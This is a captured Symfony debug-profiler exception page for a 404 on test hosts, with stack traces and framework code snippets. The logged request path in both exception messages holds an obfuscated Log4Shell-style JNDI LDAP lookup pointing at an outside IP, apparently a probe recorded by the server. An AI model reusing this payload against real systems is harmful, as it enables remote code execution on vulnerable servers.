Exceptions
Exceptions 2
Symfony\Component\HttpKernel\Exception\ NotFoundHttpException
Show exception properties
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#278 -statusCode: 404 -headers: [] }
if ($referer = $request->headers->get('referer')) {$message .= \sprintf(' (from "%s")', $referer);}throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {$message = \sprintf('No route found for "%s %s": Method Not Allowed (Allow: %s)', $request->getMethod(), $request->getUriForPath($request->getPathInfo()), implode(', ', $e->getAllowedMethods()));throw new MethodNotAllowedHttpException($e->getAllowedMethods(), $message, $e);}
in
vendor/symfony/event-dispatcher/Debug/WrappedListener.php
->
onKernelRequest
(line 115)
$this->priority ??= $dispatcher->getListenerPriority($eventName, $this->listener);$e = $this->stopwatch->start($this->name, 'event_listener');try {($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {if ($e->isStarted()) {$e->stop();}}
in
vendor/symfony/event-dispatcher/EventDispatcher.php
->
__invoke
(line 206)
foreach ($listeners as $listener) {if ($stoppable && $event->isPropagationStopped()) {break;}$listener($event, $eventName, $this);}}/*** Sorts the internal list of listeners for the given event by priority.
in
vendor/symfony/event-dispatcher/EventDispatcher.php
->
callListeners
(line 56)
} else {$listeners = $this->getListeners($eventName);}if ($listeners) {$this->callListeners($listeners, $eventName, $event);}return $event;}
in
vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php
->
dispatch
(line 126)
try {$this->beforeDispatch($eventName, $event);try {$e = $this->stopwatch->start($eventName, 'section');try {$this->dispatcher->dispatch($event, $eventName);} finally {if ($e->isStarted()) {$e->stop();}}
in
vendor/symfony/http-kernel/HttpKernel.php
->
dispatch
(line 159)
*/private function handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response{// request$event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);if ($event->hasResponse()) {return $this->filterResponse($event->getResponse(), $request, $type);}
in
vendor/symfony/http-kernel/HttpKernel.php
->
handleRaw
(line 76)
$request->headers->set('X-Php-Ob-Level', (string) ob_get_level());$this->requestStack->push($request);$response = null;try {return $response = $this->handleRaw($request, $type);} catch (\Throwable $e) {if ($e instanceof \Error && !$this->handleAllThrowables) {throw $e;}
in
vendor/symfony/http-kernel/Kernel.php
->
handle
(line 193)
if (!$this->handlingHttpCache) {$this->resetServices = true;}try {return $this->getHttpKernel()->handle($request, $type, $catch);} finally {--$this->requestStackSize;}}
in
vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php
->
handle
(line 35)
) {}public function run(): int{$response = $this->kernel->handle($this->request);if (Kernel::VERSION_ID >= 60400) {$response->send(false);if (\function_exists('fastcgi_finish_request') && !$this->debug) {
in
vendor/autoload_runtime.php
->
run
(line 32)
$app = $app(...$args);exit($runtime->getRunner($app)->run());
<?phpuse App\Kernel;require_once dirname(__DIR__).'/vendor/autoload_runtime.php';return function (array $context) {return new Kernel($context['APP_ENV'], (bool) $context['APP_DEBUG']);};
Symfony\Component\Routing\Exception\ ResourceNotFoundException
if ($allowSchemes) {goto redirect_scheme;}}throw new ResourceNotFoundException(\sprintf('No routes found for "%s".', $pathinfo));}private function doMatch(string $pathinfo, array &$allow = [], array &$allowSchemes = []): array{$allow = $allowSchemes = [];
in
vendor/symfony/routing/Matcher/UrlMatcher.php
->
match
(line 90)
public function matchRequest(Request $request): array{$this->request = $request;$ret = $this->match($request->getPathInfo());$this->request = null;return $ret;}
in
vendor/symfony/routing/Router.php
->
matchRequest
(line 188)
if (!$matcher instanceof RequestMatcherInterface) {// fallback to the default UrlMatcherInterfacereturn $matcher->match($request->getPathInfo());}return $matcher->matchRequest($request);}/*** Gets the UrlMatcher or RequestMatcher instance associated with this Router.*/
in
vendor/symfony/http-kernel/EventListener/RouterListener.php
->
matchRequest
(line 101)
// add attributes based on the request (routing)try {// matching a request is more powerful than matching a URL path + context, so try that firstif ($this->matcher instanceof RequestMatcherInterface) {$parameters = $this->matcher->matchRequest($request);} else {$parameters = $this->matcher->match($request->getPathInfo());}$this->logger?->info('Matched route "{route}".', [
in
vendor/symfony/event-dispatcher/Debug/WrappedListener.php
->
onKernelRequest
(line 115)
$this->priority ??= $dispatcher->getListenerPriority($eventName, $this->listener);$e = $this->stopwatch->start($this->name, 'event_listener');try {($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {if ($e->isStarted()) {$e->stop();}}
in
vendor/symfony/event-dispatcher/EventDispatcher.php
->
__invoke
(line 206)
foreach ($listeners as $listener) {if ($stoppable && $event->isPropagationStopped()) {break;}$listener($event, $eventName, $this);}}/*** Sorts the internal list of listeners for the given event by priority.
in
vendor/symfony/event-dispatcher/EventDispatcher.php
->
callListeners
(line 56)
} else {$listeners = $this->getListeners($eventName);}if ($listeners) {$this->callListeners($listeners, $eventName, $event);}return $event;}
in
vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php
->
dispatch
(line 126)
try {$this->beforeDispatch($eventName, $event);try {$e = $this->stopwatch->start($eventName, 'section');try {$this->dispatcher->dispatch($event, $eventName);} finally {if ($e->isStarted()) {$e->stop();}}
in
vendor/symfony/http-kernel/HttpKernel.php
->
dispatch
(line 159)
*/private function handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response{// request$event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);if ($event->hasResponse()) {return $this->filterResponse($event->getResponse(), $request, $type);}
in
vendor/symfony/http-kernel/HttpKernel.php
->
handleRaw
(line 76)
$request->headers->set('X-Php-Ob-Level', (string) ob_get_level());$this->requestStack->push($request);$response = null;try {return $response = $this->handleRaw($request, $type);} catch (\Throwable $e) {if ($e instanceof \Error && !$this->handleAllThrowables) {throw $e;}
in
vendor/symfony/http-kernel/Kernel.php
->
handle
(line 193)
if (!$this->handlingHttpCache) {$this->resetServices = true;}try {return $this->getHttpKernel()->handle($request, $type, $catch);} finally {--$this->requestStackSize;}}
in
vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php
->
handle
(line 35)
) {}public function run(): int{$response = $this->kernel->handle($this->request);if (Kernel::VERSION_ID >= 60400) {$response->send(false);if (\function_exists('fastcgi_finish_request') && !$this->debug) {
in
vendor/autoload_runtime.php
->
run
(line 32)
$app = $app(...$args);exit($runtime->getRunner($app)->run());
<?phpuse App\Kernel;require_once dirname(__DIR__).'/vendor/autoload_runtime.php';return function (array $context) {return new Kernel($context['APP_ENV'], (bool) $context['APP_DEBUG']);};
Logs
| Level | Channel | Message |
|---|---|---|
| INFO 17:06:00 | request |
Matched route "_profiler". {
"route": "_profiler",
"route_parameters": {
"_route": "_profiler",
"_controller": "web_profiler.controller.profiler::panelAction",
"token": "d0867e"
},
"request_uri": "http://hackettss22test.aulaexperto.net:8085/_profiler/d0867e?panel=exception&type=request",
"method": "GET"
}
|
Stack Traces 2
|
[2/2]
NotFoundHttpException
|
|---|
Symfony\Component\HttpKernel\Exception\NotFoundHttpException:
No route found for "GET http://bunge.aulaexperto.net:8085/_profiler/a5d113/search/$%7B$%7B:-j%7D$%7B:-n%7D$%7B:-d%7D$%7B:-i%7D:$%7B:-l%7D$%7B:-d%7D$%7B:-a%7D$%7B:-p%7D:/35.193.186.77:80/dn=gAAAAABqtpFhWU7uxTpamXBdm9YkYcBarIOjRX7HP2hTOT_0lY3kOvPhqzPBHwGVsp8SyIKZzYzFIZLrGprN6w3l-guVVZ7w8R1qjrNkm6k2m7NOWzZKEYwnN_72puvyMMwTA8eq8tl2Vw7kwQ60hwbqbQX9wjvOWItZbHx0ifq8SdeA3XLvS8DsONuWOfuZQhZxyDLkv1wlrYTj702ya7-Foq-hiN0IG3qB8B65Uc_Zlk4gZjhWnhoX2frkU5DcYd0jgnpwSe4EwTRrHPYwcoV_saTKfOr2jUMaElEW6G25PkYxa_3rhlXNN67_zJ7ZlomBebGSL-ySwHYQtkVgOmpBFiak8WKzdX2hSEx5BOxYPt1grAQLeXAR7pE_7IuEwNI-wkkIA6755gIfIjrKBdpuDBkzBibZLQg9zwNd7k6y49ymbJmxfCIaiMeLMebRWHYoVKAmc_64-yWlF6dPjb-5344asDDqmLFb_5wR8LPKv5ZEnSMUm1hGMjqg1hLlOkegVDxdBbyjG97kCtFSDKzqghdIB6j8DIZpWwRjOKnbwFTY6n5hhT7LJPgXtBA5jAD_TA2zI1XlPVrBs5zx3dimeoU9wJNi_OVWMk4lhAhWuiVYqcqFuChil8CQUkobPv4X6Awm8L8vixdVf543OL_EDNPg6j7SjlD5Pte3JwjxRWegbnUN58Smy6iFH17Jpx8ulmK388lYT1uKWhRvFA_dxate8PxqlJbdMgRZ6u6kbSuZi50kiaX2dXI2Y-4ZlJSv2H0H0Ayg-gmrJ0oSj6CmIP0OYXY8eFdoyaWsnNFhV1tm0SyAqOWzB76OQoOH-y6ixQ76zVao6bg7tSBh0Qndbd-0VrmsYSHiK_VVwNCdZFFfA8oKjYH6jg360vCeh7CGC8OA37KNWIT4ooxkb-4Yd767MPre05rTw530q5AoTer1xuh4w4u2Fq4-98HCadwWm9voVGfC-pLstLsnz7n2nwfK2Z1xFMWUT8UlojKwhie75tgRfTLc06Fi5GR_IGn7d38YCX6lyBnTVRPu_F1fn8qqeDgXmeYv-D6THcM6OXNJSBnzFX_mBH_Rj2CAhPScpV9kVn_7Gvh9BYKHIKIQwjAmBgtSmlDC8JewwsbnMWDg8RaI2-Sy8sNxExsVR7ZL0DyDPD5_dEbbZH0ypnWpiQwP9Yumundu61rw0OYIeIQnwi-0HjCWGTtqqm3FJFNoJ4ZbZ_JXGdt2S8Lpa5Qj12IrglJJlthhcYI2S4br8xZoQ-Nd75DLoh05OhC-eRbJglxwQ8seE9NMKXAUSxtmJX5-exN8ebN7t0uHVhohVJ1ftq6E-iVGN2D8Dm6OSEeVzgXwTj_cM5VZFdljydVQjuMphdqu_k_ZLa1Xwj2k-au1vC3aL5KTyHP429LbshzOIWL_PhkUCi9ERyGFDrb8Dh26f2VSEHJxP4wrWzYxiL3Si1plcL8VNMjMakotor26Vmc7deNSvUkqCKzreA-8CwCUfIbzYz9-8aH4KsFYbacEn_S9Nh-SBkk4uTUmjYJHaESL4vj4xGteOcLQ_q9KmSLjHEpYVzJGs2CBMba-y_QCCX6kUJBYkOcfF7G6rnhfxgXTNRueEtSazj4RalaMPaRHfNXTEv4w8aF_gONnHk6Sz5SnkIFOrtat6OfKo0pTYVfAQ5awC4QVdXJAWEIwNG7gsGqJmC3ZogyZZUY8Q9BS2vAqb0Srhd6k9ON-jK3GD385t1viKvG9S-InyDlG7h-_CZRwF3bRrzU4dn_8fdMY-24mKYT-LXZJkZURx4Rp6MgGha_x4J4ZovkGbKK9g4jqZMBGs-UxUSvvLdoHz8fwsmuwgTwb23QbfrK2VyVCoYfxFUo5cTEaZC-v1EbrCoIFMZu5eu0XRbslWtCWm6A4rXn356a77Ar0CoFYlROYIU1D1rOTHEgTt2iP20BpgUfa7Yq6gd30y2C_b-yQJ_t1WS9MQguXLrRAAi27i3dp6MmlzpVr4IoQHCzUg2ng76B36AJqBsPBTHgh-hqUyul-MMCYuIEf7tZINkLHjNN7dK_ma4vOmMSUR3pWRnWpUTRxOL1mIiAkCkaa-n5NrlnPNEavPgOGxi8dYuyRa76kni5xdnwddDlV3bsqE-j79SaoCckaI1b_gGmKMNR77MlW-J4Z6YYboXGO9XiYt7kAuSfC1xsXezh91p-fTyLIXCysCu9pW52cLDGO5h-zJa5xiQJel74T5CRU8VfsnE_sqP2xi6v5DIp9CFtpHb1s60mPZEdc4ULQCXEH6bA8XvLPzWj-S7PTV93cj4wpFnNCkaBpsLIclfcntfxZUW56fuvYSlIzAcxm1Sf4IAAVR6w1Q9pSMWpb7sl6dfqEnHKng0e9ut6Xb9QEiEPa2PEp_8bEA2Sh-RKFUpOznuL52ADjFXyz2xuTb9E935-2t7p1TJCKhhWevXztNldzRqy2gSHXsqesW213szsDWYWQjViY2399VZxjIZ1LnB6LRFUGphOUldBKMXNJRT5VSNsjxOKwYmQnUjyWBR5BsH933McaGlQhbs5xUNZ-9tzwMjI8yF1yYekGSuuHsbnI2Oe0QPdWp-udIHxfCDo_F0TUL3EtERv2hIg=%7D/"
at vendor/symfony/http-kernel/EventListener/RouterListener.php:156
at Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(object(RequestEvent), 'kernel.request', object(TraceableEventDispatcher))
(vendor/symfony/event-dispatcher/Debug/WrappedListener.php:115)
at Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object(RequestEvent), 'kernel.request', object(TraceableEventDispatcher))
(vendor/symfony/event-dispatcher/EventDispatcher.php:206)
at Symfony\Component\EventDispatcher\EventDispatcher->callListeners(array(object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener)), 'kernel.request', object(RequestEvent))
(vendor/symfony/event-dispatcher/EventDispatcher.php:56)
at Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object(RequestEvent), 'kernel.request')
(vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:126)
at Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object(RequestEvent), 'kernel.request')
(vendor/symfony/http-kernel/HttpKernel.php:159)
at Symfony\Component\HttpKernel\HttpKernel->handleRaw(object(Request), 1)
(vendor/symfony/http-kernel/HttpKernel.php:76)
at Symfony\Component\HttpKernel\HttpKernel->handle(object(Request), 1, true)
(vendor/symfony/http-kernel/Kernel.php:193)
at Symfony\Component\HttpKernel\Kernel->handle(object(Request))
(vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35)
at Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run()
(vendor/autoload_runtime.php:32)
at require_once('/var/www/html/vendor/autoload_runtime.php')
(public/index.php:5)
|
|
[1/2]
ResourceNotFoundException
|
|---|
Symfony\Component\Routing\Exception\ResourceNotFoundException:
No routes found for "/_profiler/a5d113/search/$%7B$%7B:-j%7D$%7B:-n%7D$%7B:-d%7D$%7B:-i%7D:$%7B:-l%7D$%7B:-d%7D$%7B:-a%7D$%7B:-p%7D:/35.193.186.77:80/dn=gAAAAABqtpFhWU7uxTpamXBdm9YkYcBarIOjRX7HP2hTOT_0lY3kOvPhqzPBHwGVsp8SyIKZzYzFIZLrGprN6w3l-guVVZ7w8R1qjrNkm6k2m7NOWzZKEYwnN_72puvyMMwTA8eq8tl2Vw7kwQ60hwbqbQX9wjvOWItZbHx0ifq8SdeA3XLvS8DsONuWOfuZQhZxyDLkv1wlrYTj702ya7-Foq-hiN0IG3qB8B65Uc_Zlk4gZjhWnhoX2frkU5DcYd0jgnpwSe4EwTRrHPYwcoV_saTKfOr2jUMaElEW6G25PkYxa_3rhlXNN67_zJ7ZlomBebGSL-ySwHYQtkVgOmpBFiak8WKzdX2hSEx5BOxYPt1grAQLeXAR7pE_7IuEwNI-wkkIA6755gIfIjrKBdpuDBkzBibZLQg9zwNd7k6y49ymbJmxfCIaiMeLMebRWHYoVKAmc_64-yWlF6dPjb-5344asDDqmLFb_5wR8LPKv5ZEnSMUm1hGMjqg1hLlOkegVDxdBbyjG97kCtFSDKzqghdIB6j8DIZpWwRjOKnbwFTY6n5hhT7LJPgXtBA5jAD_TA2zI1XlPVrBs5zx3dimeoU9wJNi_OVWMk4lhAhWuiVYqcqFuChil8CQUkobPv4X6Awm8L8vixdVf543OL_EDNPg6j7SjlD5Pte3JwjxRWegbnUN58Smy6iFH17Jpx8ulmK388lYT1uKWhRvFA_dxate8PxqlJbdMgRZ6u6kbSuZi50kiaX2dXI2Y-4ZlJSv2H0H0Ayg-gmrJ0oSj6CmIP0OYXY8eFdoyaWsnNFhV1tm0SyAqOWzB76OQoOH-y6ixQ76zVao6bg7tSBh0Qndbd-0VrmsYSHiK_VVwNCdZFFfA8oKjYH6jg360vCeh7CGC8OA37KNWIT4ooxkb-4Yd767MPre05rTw530q5AoTer1xuh4w4u2Fq4-98HCadwWm9voVGfC-pLstLsnz7n2nwfK2Z1xFMWUT8UlojKwhie75tgRfTLc06Fi5GR_IGn7d38YCX6lyBnTVRPu_F1fn8qqeDgXmeYv-D6THcM6OXNJSBnzFX_mBH_Rj2CAhPScpV9kVn_7Gvh9BYKHIKIQwjAmBgtSmlDC8JewwsbnMWDg8RaI2-Sy8sNxExsVR7ZL0DyDPD5_dEbbZH0ypnWpiQwP9Yumundu61rw0OYIeIQnwi-0HjCWGTtqqm3FJFNoJ4ZbZ_JXGdt2S8Lpa5Qj12IrglJJlthhcYI2S4br8xZoQ-Nd75DLoh05OhC-eRbJglxwQ8seE9NMKXAUSxtmJX5-exN8ebN7t0uHVhohVJ1ftq6E-iVGN2D8Dm6OSEeVzgXwTj_cM5VZFdljydVQjuMphdqu_k_ZLa1Xwj2k-au1vC3aL5KTyHP429LbshzOIWL_PhkUCi9ERyGFDrb8Dh26f2VSEHJxP4wrWzYxiL3Si1plcL8VNMjMakotor26Vmc7deNSvUkqCKzreA-8CwCUfIbzYz9-8aH4KsFYbacEn_S9Nh-SBkk4uTUmjYJHaESL4vj4xGteOcLQ_q9KmSLjHEpYVzJGs2CBMba-y_QCCX6kUJBYkOcfF7G6rnhfxgXTNRueEtSazj4RalaMPaRHfNXTEv4w8aF_gONnHk6Sz5SnkIFOrtat6OfKo0pTYVfAQ5awC4QVdXJAWEIwNG7gsGqJmC3ZogyZZUY8Q9BS2vAqb0Srhd6k9ON-jK3GD385t1viKvG9S-InyDlG7h-_CZRwF3bRrzU4dn_8fdMY-24mKYT-LXZJkZURx4Rp6MgGha_x4J4ZovkGbKK9g4jqZMBGs-UxUSvvLdoHz8fwsmuwgTwb23QbfrK2VyVCoYfxFUo5cTEaZC-v1EbrCoIFMZu5eu0XRbslWtCWm6A4rXn356a77Ar0CoFYlROYIU1D1rOTHEgTt2iP20BpgUfa7Yq6gd30y2C_b-yQJ_t1WS9MQguXLrRAAi27i3dp6MmlzpVr4IoQHCzUg2ng76B36AJqBsPBTHgh-hqUyul-MMCYuIEf7tZINkLHjNN7dK_ma4vOmMSUR3pWRnWpUTRxOL1mIiAkCkaa-n5NrlnPNEavPgOGxi8dYuyRa76kni5xdnwddDlV3bsqE-j79SaoCckaI1b_gGmKMNR77MlW-J4Z6YYboXGO9XiYt7kAuSfC1xsXezh91p-fTyLIXCysCu9pW52cLDGO5h-zJa5xiQJel74T5CRU8VfsnE_sqP2xi6v5DIp9CFtpHb1s60mPZEdc4ULQCXEH6bA8XvLPzWj-S7PTV93cj4wpFnNCkaBpsLIclfcntfxZUW56fuvYSlIzAcxm1Sf4IAAVR6w1Q9pSMWpb7sl6dfqEnHKng0e9ut6Xb9QEiEPa2PEp_8bEA2Sh-RKFUpOznuL52ADjFXyz2xuTb9E935-2t7p1TJCKhhWevXztNldzRqy2gSHXsqesW213szsDWYWQjViY2399VZxjIZ1LnB6LRFUGphOUldBKMXNJRT5VSNsjxOKwYmQnUjyWBR5BsH933McaGlQhbs5xUNZ-9tzwMjI8yF1yYekGSuuHsbnI2Oe0QPdWp-udIHxfCDo_F0TUL3EtERv2hIg=%7D".
at vendor/symfony/routing/Matcher/Dumper/CompiledUrlMatcherTrait.php:70
at Symfony\Component\Routing\Matcher\CompiledUrlMatcher->match('/_profiler/a5d113/search/$%7B$%7B:-j%7D$%7B:-n%7D$%7B:-d%7D$%7B:-i%7D:$%7B:-l%7D$%7B:-d%7D$%7B:-a%7D$%7B:-p%7D:/35.193.186.77:80/dn=gAAAAABqtpFhWU7uxTpamXBdm9YkYcBarIOjRX7HP2hTOT_0lY3kOvPhqzPBHwGVsp8SyIKZzYzFIZLrGprN6w3l-guVVZ7w8R1qjrNkm6k2m7NOWzZKEYwnN_72puvyMMwTA8eq8tl2Vw7kwQ60hwbqbQX9wjvOWItZbHx0ifq8SdeA3XLvS8DsONuWOfuZQhZxyDLkv1wlrYTj702ya7-Foq-hiN0IG3qB8B65Uc_Zlk4gZjhWnhoX2frkU5DcYd0jgnpwSe4EwTRrHPYwcoV_saTKfOr2jUMaElEW6G25PkYxa_3rhlXNN67_zJ7ZlomBebGSL-ySwHYQtkVgOmpBFiak8WKzdX2hSEx5BOxYPt1grAQLeXAR7pE_7IuEwNI-wkkIA6755gIfIjrKBdpuDBkzBibZLQg9zwNd7k6y49ymbJmxfCIaiMeLMebRWHYoVKAmc_64-yWlF6dPjb-5344asDDqmLFb_5wR8LPKv5ZEnSMUm1hGMjqg1hLlOkegVDxdBbyjG97kCtFSDKzqghdIB6j8DIZpWwRjOKnbwFTY6n5hhT7LJPgXtBA5jAD_TA2zI1XlPVrBs5zx3dimeoU9wJNi_OVWMk4lhAhWuiVYqcqFuChil8CQUkobPv4X6Awm8L8vixdVf543OL_EDNPg6j7SjlD5Pte3JwjxRWegbnUN58Smy6iFH17Jpx8ulmK388lYT1uKWhRvFA_dxate8PxqlJbdMgRZ6u6kbSuZi50kiaX2dXI2Y-4ZlJSv2H0H0Ayg-gmrJ0oSj6CmIP0OYXY8eFdoyaWsnNFhV1tm0SyAqOWzB76OQoOH-y6ixQ76zVao6bg7tSBh0Qndbd-0VrmsYSHiK_VVwNCdZFFfA8oKjYH6jg360vCeh7CGC8OA37KNWIT4ooxkb-4Yd767MPre05rTw530q5AoTer1xuh4w4u2Fq4-98HCadwWm9voVGfC-pLstLsnz7n2nwfK2Z1xFMWUT8UlojKwhie75tgRfTLc06Fi5GR_IGn7d38YCX6lyBnTVRPu_F1fn8qqeDgXmeYv-D6THcM6OXNJSBnzFX_mBH_Rj2CAhPScpV9kVn_7Gvh9BYKHIKIQwjAmBgtSmlDC8JewwsbnMWDg8RaI2-Sy8sNxExsVR7ZL0DyDPD5_dEbbZH0ypnWpiQwP9Yumundu61rw0OYIeIQnwi-0HjCWGTtqqm3FJFNoJ4ZbZ_JXGdt2S8Lpa5Qj12IrglJJlthhcYI2S4br8xZoQ-Nd75DLoh05OhC-eRbJglxwQ8seE9NMKXAUSxtmJX5-exN8ebN7t0uHVhohVJ1ftq6E-iVGN2D8Dm6OSEeVzgXwTj_cM5VZFdljydVQjuMphdqu_k_ZLa1Xwj2k-au1vC3aL5KTyHP429LbshzOIWL_PhkUCi9ERyGFDrb8Dh26f2VSEHJxP4wrWzYxiL3Si1plcL8VNMjMakotor26Vmc7deNSvUkqCKzreA-8CwCUfIbzYz9-8aH4KsFYbacEn_S9Nh-SBkk4uTUmjYJHaESL4vj4xGteOcLQ_q9KmSLjHEpYVzJGs2CBMba-y_QCCX6kUJBYkOcfF7G6rnhfxgXTNRueEtSazj4RalaMPaRHfNXTEv4w8aF_gONnHk6Sz5SnkIFOrtat6OfKo0pTYVfAQ5awC4QVdXJAWEIwNG7gsGqJmC3ZogyZZUY8Q9BS2vAqb0Srhd6k9ON-jK3GD385t1viKvG9S-InyDlG7h-_CZRwF3bRrzU4dn_8fdMY-24mKYT-LXZJkZURx4Rp6MgGha_x4J4ZovkGbKK9g4jqZMBGs-UxUSvvLdoHz8fwsmuwgTwb23QbfrK2VyVCoYfxFUo5cTEaZC-v1EbrCoIFMZu5eu0XRbslWtCWm6A4rXn356a77Ar0CoFYlROYIU1D1rOTHEgTt2iP20BpgUfa7Yq6gd30y2C_b-yQJ_t1WS9MQguXLrRAAi27i3dp6MmlzpVr4IoQHCzUg2ng76B36AJqBsPBTHgh-hqUyul-MMCYuIEf7tZINkLHjNN7dK_ma4vOmMSUR3pWRnWpUTRxOL1mIiAkCkaa-n5NrlnPNEavPgOGxi8dYuyRa76kni5xdnwddDlV3bsqE-j79SaoCckaI1b_gGmKMNR77MlW-J4Z6YYboXGO9XiYt7kAuSfC1xsXezh91p-fTyLIXCysCu9pW52cLDGO5h-zJa5xiQJel74T5CRU8VfsnE_sqP2xi6v5DIp9CFtpHb1s60mPZEdc4ULQCXEH6bA8XvLPzWj-S7PTV93cj4wpFnNCkaBpsLIclfcntfxZUW56fuvYSlIzAcxm1Sf4IAAVR6w1Q9pSMWpb7sl6dfqEnHKng0e9ut6Xb9QEiEPa2PEp_8bEA2Sh-RKFUpOznuL52ADjFXyz2xuTb9E935-2t7p1TJCKhhWevXztNldzRqy2gSHXsqesW213szsDWYWQjViY2399VZxjIZ1LnB6LRFUGphOUldBKMXNJRT5VSNsjxOKwYmQnUjyWBR5BsH933McaGlQhbs5xUNZ-9tzwMjI8yF1yYekGSuuHsbnI2Oe0QPdWp-udIHxfCDo_F0TUL3EtERv2hIg=%7D')
(vendor/symfony/routing/Matcher/UrlMatcher.php:90)
at Symfony\Component\Routing\Matcher\UrlMatcher->matchRequest(object(Request))
(vendor/symfony/routing/Router.php:188)
at Symfony\Component\Routing\Router->matchRequest(object(Request))
(vendor/symfony/http-kernel/EventListener/RouterListener.php:101)
at Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(object(RequestEvent), 'kernel.request', object(TraceableEventDispatcher))
(vendor/symfony/event-dispatcher/Debug/WrappedListener.php:115)
at Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object(RequestEvent), 'kernel.request', object(TraceableEventDispatcher))
(vendor/symfony/event-dispatcher/EventDispatcher.php:206)
at Symfony\Component\EventDispatcher\EventDispatcher->callListeners(array(object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener), object(WrappedListener)), 'kernel.request', object(RequestEvent))
(vendor/symfony/event-dispatcher/EventDispatcher.php:56)
at Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object(RequestEvent), 'kernel.request')
(vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:126)
at Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object(RequestEvent), 'kernel.request')
(vendor/symfony/http-kernel/HttpKernel.php:159)
at Symfony\Component\HttpKernel\HttpKernel->handleRaw(object(Request), 1)
(vendor/symfony/http-kernel/HttpKernel.php:76)
at Symfony\Component\HttpKernel\HttpKernel->handle(object(Request), 1, true)
(vendor/symfony/http-kernel/Kernel.php:193)
at Symfony\Component\HttpKernel\Kernel->handle(object(Request))
(vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35)
at Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run()
(vendor/autoload_runtime.php:32)
at require_once('/var/www/html/vendor/autoload_runtime.php')
(public/index.php:5)
|